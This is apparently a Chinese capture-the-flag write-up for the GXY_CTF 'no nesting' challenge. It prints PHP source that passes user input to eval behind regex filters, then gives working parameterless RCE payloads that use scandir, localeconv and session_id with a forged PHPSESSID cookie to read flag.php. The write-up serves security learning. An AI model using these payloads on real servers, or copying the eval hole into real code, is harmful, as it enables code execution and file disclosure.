首先用githack扫一波,获得源码.
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
// echo $_GET['exp'];
@eval($_GET['exp']);
}
else{
die("还差一点哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("还想读flag,臭弟弟!");
}
}
// highlight_file(__FILE__);
?>
可以看到,题目中有@eval($_GET['exp']);,在一般情况下我们可以直接用其getshell,但由于此处的第二个if:if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))导致我们如果使用了参数便无法通过正则校验.这是典型的无参数RCE.(正则中的?R表示引用当前表达式,后面加上?递归调用.)而该正则只允许以下格式的函数:
a(b());/a();,而a('xxx');这样的使用了参数的形式则不被允许.
回到题目,首先我们要做的就是查看目录.scandir读当前目录并返回结果的代码:print_r(scandir('.'));但是由于不能使用参数所以还要用上:current(localeconv())来取代scandir('.')中的.(参考简析GXY_CTF “禁止套娃”无参数RCE)
于是将上述所说整合,payload为:?exp=print_r(scandir(current(localeconv())));
可以看到页面回显:
flag在哪里呢? Array ( [0] => . [1] => .. [2] => .git [3] => flag.php [4] => index.php )
直接访问无法获得flag.php的内容,这里可以用PHPSESSID来操作.
利用工具添加名为PHPSESSID的cookie,令其值为flag.php.然后用?exp=print_r(session_id(session_start()));显示PHPSESSID的内容,即flag.php这一字符串.
最后用highlight_file()获取flag.php的内容.
最终payload:?exp=highlight_file(session_id(session_start()));
获得flag.
No responses yet